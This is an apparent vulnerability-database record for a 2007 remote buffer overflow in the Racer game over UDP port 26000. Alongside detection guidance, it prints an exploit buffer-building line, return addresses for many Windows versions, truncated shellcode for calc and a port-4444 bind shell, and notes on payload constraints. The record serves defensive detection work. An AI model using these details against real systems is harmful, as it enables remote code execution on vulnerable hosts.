CVE-2007-4370
published 2007-08-15

Priority: P3 (52) · Severity: high · CVSS 2.0: 7.5 (vector AV:N/AC:L/Au:N/C:P/I:P/A:P)
Flags: EXPLOIT
EPSS: 59.20% (99.0th percentile)
Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port 26000.

Affected (1 range)

Vendor: racer · Product: racer · Version range: not listed · Fixed in: not listed

Detection & IOCs (extracted from sources)

port: UDP/26000
command: buf = Rex::Text.rand_text_alphanumeric(1001); buf << [target.ret].pack('V'); buf << payload.encoded; buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length); udp_sock.put(buf)
other: Ret=0x10073FB7 (jmp esp, Fmodex.dll - Universal)
other: Ret=0x77d8af0a (Win XP SP2 English)
other: Ret=0x7c951eed (Win XP SP2 Spanish)
other: EIP=0x7C86467B (JMP ESP, Kernel32.dll, Win XP Pro SP3 English)
other: EIP=0x010013D9 (Win XP-Universal 1)
other: EIP=0x77E81674 (Windows 2000 SP0 English)
other: EIP=0x77E829EC (Windows XP SP1 English)
other: EIP=0x77E824B5 (Windows 2000 SP2 English)
other: EIP=0x77E8367A (Windows 2000 SP3 English)
other: EIP=0x77F92A9B (Windows 2000 SP4 English)
other: EIP=0x77E9AFE3 (Windows XP SP0 English)
other: EIP=0x77E626BA (Win XP-Universal 2)
port: 4444
bytes: Run Calc.exe shellcode (alphanumeric encoded, 339 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
bytes: Bind shell on port 4444 shellcode (alphanumeric encoded, 238 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
  • Detect oversized UDP datagrams (>1000 bytes) sent to port 26000, which is the trigger condition for the buffer overflow in both the Racer client and server.
  • The Metasploit module sends a 1001-byte alphanumeric random buffer followed by the return address and payload (total ~2197 bytes) over UDP/26000; alert on UDP/26000 datagrams exceeding 1000 bytes.
  • The exploit payload uses AlphanumUpper encoding with bad characters \x5c and \x00; look for large all-uppercase alphanumeric UDP payloads on port 26000.
  • The C exploit fills the packet buffer with repeated 'E' characters before appending the return address; a UDP/26000 payload consisting of a long run of 0x45 ('E') bytes is a strong indicator of exploitation.
  • Post-exploitation, the bind-shell payload opens TCP port 4444 on the victim; monitor for unexpected listening services on port 4444 following inbound UDP/26000 traffic.
  • The universal target uses a JMP ESP gadget in Fmodex.dll at 0x10073FB7; presence of this return address (bytes B7 3F 07 10) in a UDP/26000 payload indicates Metasploit exploitation.
  • The Metasploit module targets Windows only ('Platform' => 'win'); the NVD advisory notes both client and server are affected, so both processes on UDP/26000 are attack surfaces.
  • Payload space is limited to 1000 bytes with AlphanumUpper encoding required; larger or non-alphanumeric shellcode will not fit without adjustment.
  • The C exploit notes the vulnerability can be exploited using either a classic stack overflow (JMP ESP) or an SEH-based method, so detection should account for both exploitation techniques.